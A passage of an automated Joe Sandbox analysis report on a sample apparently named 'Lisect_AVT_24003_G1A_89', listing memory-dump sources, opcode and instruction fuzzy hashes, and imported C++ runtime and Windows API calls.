                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59e0b6ab05e6d3754ddb5aff43c09232110fbd5af72607475b8ba49c72dfe952
                                  • Instruction ID: f7a70bf0ff2aa0621eb900fe06f794aa07e7d7c3896efcbe0baf6abedd6b43cf
                                  • Opcode Fuzzy Hash: 59e0b6ab05e6d3754ddb5aff43c09232110fbd5af72607475b8ba49c72dfe952
                                  • Instruction Fuzzy Hash:
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmp, Offset: 01112000, based on PE: true
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b677d8d46514a3c72c2b06aea34cb8e8104c8a5924a8daa3c1c8b94d1fe0403
                                  • Instruction ID: 8f96e54d3adb3fed6220113db2ad46bc59484b87795abd4c0d3215ab3200b1b1
                                  • Opcode Fuzzy Hash: 6b677d8d46514a3c72c2b06aea34cb8e8104c8a5924a8daa3c1c8b94d1fe0403
                                  • Instruction Fuzzy Hash:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::invalid_argument::invalid_argument
                                  • String ID: string too long
                                  • API String ID: 2141394445-2556327735
                                  • Opcode ID: 08115365cb46d6a194b282cb58bab90a228a9701605f77513c53e4fc0df00ff0
                                  • Instruction ID: d2b6d521280f5b3d7ee6cbc1f765ff2bc18f3d57812c22eadc45fee96821e4a0
                                  • Opcode Fuzzy Hash: 08115365cb46d6a194b282cb58bab90a228a9701605f77513c53e4fc0df00ff0
                                  • Instruction Fuzzy Hash: 53811275D041869FEB02CFA9C4517EEFFB1AF1A300F184199D994AB782C3798546DBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d09dae959fbda9a1914dc1f51ebe21166aa9c6122aa1b87f88e03a7f5a665483
                                  • Instruction ID: 3cfdb621026a5d576b50766255eab27507eb8ec39b00767ab839e1cda00475df
                                  • Opcode Fuzzy Hash: d09dae959fbda9a1914dc1f51ebe21166aa9c6122aa1b87f88e03a7f5a665483
                                  • Instruction Fuzzy Hash: 8A626CB0E002059BDB54CF59C5846ADBFF5BF88308F2881ADD984AB352D776DA46CF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ba66d91c6dc935394dd06463b90bb510e4559d994cd0e7c1df5d115c8601c1b
                                  • Instruction ID: 0b2a7affa3f23db11c0c6b148cd307a48fc8f5ebaeac7791cc96afe1abbcf615
                                  • Opcode Fuzzy Hash: 6ba66d91c6dc935394dd06463b90bb510e4559d994cd0e7c1df5d115c8601c1b
                                  • Instruction Fuzzy Hash: 3EC1FC7060064B8FDF65CF6CC9A4ABABBF1EF05308F18468DD9D687691C735A844EB60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID:
                                  • API String ID: 1452528299-0
                                  • Opcode ID: eaf3258b31fed4e26ce2a0be1a44f37e7be8fb88e9b06e0a29fc3723a42b2505
                                  • Instruction ID: 0fc3b49b30977bd1e0c12dbcb1a09f91957527a45fac37bf972315688c74816f
                                  • Opcode Fuzzy Hash: eaf3258b31fed4e26ce2a0be1a44f37e7be8fb88e9b06e0a29fc3723a42b2505
                                  • Instruction Fuzzy Hash: 30B1F6755007029BDB299BE8CC81AFBB3E8EF54708F84856DE9C3C6981EA75F585C710
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c631f431e3e305a13399d66cf2f7cfb926075034a35dc8dc6cf9d2d77db29113
                                  • Instruction ID: 5ae2a3a835015339563cdeacd566c9869d8ddbb48599f8e29dc014c796620f6d
                                  • Opcode Fuzzy Hash: c631f431e3e305a13399d66cf2f7cfb926075034a35dc8dc6cf9d2d77db29113
                                  • Instruction Fuzzy Hash: 1171D075E002468FDB15CF6AD8907EEBBB5FB1A310F480169D8559BA83C3399906DBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7ad1c70fb7611a78e16ee93c219e234e188b403368d2d25889d59aa9a6c7ea8
                                  • Instruction ID: 0fa7e6daf204cdb60ab310f8916d5c9d37457cd0e6bb7c1886a7ee97909c383a
                                  • Opcode Fuzzy Hash: e7ad1c70fb7611a78e16ee93c219e234e188b403368d2d25889d59aa9a6c7ea8
                                  • Instruction Fuzzy Hash: 37616731720565CFD768CF1EE8D0536B751E38A3153858219EAC1C738EC53EE926CBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
                                  • Instruction ID: b4590d0aca44cc7bfc63cdce61b8a3e985a2294bb38c4fed482d3f2026bced17
                                  • Opcode Fuzzy Hash: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
                                  • Instruction Fuzzy Hash: 64516E72D00219EFDF14CFA9C950AEEBBB2FF88304F498099E555AB241D774AA41DF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction ID: 9fb7e8010b245f92a300f8ec1c5ba855b1f8370df443718f30ac94e2bbdfbb3b
                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction Fuzzy Hash: 0211B67BA4114243EF94862DD8B86BFEBDEFAC523172D42FAF2D24B65CD1229145BD00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4461588188.000000007ECA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ECA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7eca0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c5514b911be63635020df5e2a2dd3c9ac482895b02f3fdcba835224cf8f410a3
                                  • Instruction ID: 240414475ba83a703be6bba0b0a62e40812672c08006fdb53f4d344afb1bda65
                                  • Opcode Fuzzy Hash: c5514b911be63635020df5e2a2dd3c9ac482895b02f3fdcba835224cf8f410a3
                                  • Instruction Fuzzy Hash:
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0101AEB3
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0101AED5
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0101AEF5
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0101AF1F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0101AF8D
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0101AFD9
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0101AFF3
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0101B088
                                  • std::_Facet_Register.LIBCPMT ref: 0101B095
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                  • String ID: bad locale name
                                  • API String ID: 3375549084-1405518554
                                  • Opcode ID: b007fec9fa70bf17bcf7a083b3d75a22ba3918e6af5114fa4e8887a352885131
                                  • Instruction ID: 1b088730a5b7a735850d0f6b2b82f94ab3a43a062e94a9937147200c284f5377
                                  • Opcode Fuzzy Hash: b007fec9fa70bf17bcf7a083b3d75a22ba3918e6af5114fa4e8887a352885131
                                  • Instruction Fuzzy Hash: 57616FB1E01245DBDF61EFA8D884BDEBBF4AF14710F144098E894AB285E739E905CB91
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 0108C086
                                  • GetCurrentThreadId.KERNEL32 ref: 0108C0A3
                                  • GetCurrentThreadId.KERNEL32 ref: 0108C0C4
                                  • GetCurrentThreadId.KERNEL32 ref: 0108C147
                                  • __Xtime_diff_to_millis2.LIBCPMT ref: 0108C15F
                                  • GetCurrentThreadId.KERNEL32 ref: 0108C18B
                                  • GetCurrentThreadId.KERNEL32 ref: 0108C1D1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentThread$Xtime_diff_to_millis2
                                  • String ID:
                                  • API String ID: 1280559528-0
                                  • Opcode ID: ea3a3529ddd6a6e11168394ff2bfd893331f9da2e6eb37488a88a184baf929ba
                                  • Instruction ID: cee6ed03959b9d1c56d215e1eaf1ecdce900730956e2426486f74e1de1bd0735
                                  • Opcode Fuzzy Hash: ea3a3529ddd6a6e11168394ff2bfd893331f9da2e6eb37488a88a184baf929ba
                                  • Instruction Fuzzy Hash: C2518131918215CFEF21EF28C6C05E9BBF1FF0A710B154499E9C6AB285CB31E941CB64
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00FB37E9
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FB3835
                                  • __Getctype.LIBCPMT ref: 00FB384E
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00FB386A
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB38FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                  • String ID: bad locale name
                                  • API String ID: 1840309910-1405518554
                                  • Opcode ID: aa1b80a36cca90d85cbee2c87331fa7513abd1b91f8ddc1322a24ce38dff99fe
                                  • Instruction ID: 2bf3dc40230fb40588b2c7c57578a3429cd1b64f804d6873bd81ece7d6c8df57
                                  • Opcode Fuzzy Hash: aa1b80a36cca90d85cbee2c87331fa7513abd1b91f8ddc1322a24ce38dff99fe
                                  • Instruction Fuzzy Hash: 605183F1D043499BDF10EFA5D984BDEFBB8AF14310F144169E854AB240E775EA04DB92
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 010908B7
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 010908BF
                                  • _ValidateLocalCookies.LIBCMT ref: 01090948
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 01090973
                                  • _ValidateLocalCookies.LIBCMT ref: 010909C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 898e4d5caacfcc800a95fb9a43e2e308bc55c5968f9de80e292ca88134c41fc3
                                  • Instruction ID: 5baa6b7af859b4495ebfd58e2f87d6214ac5a01d7b4de08d73b14e1163ed1494
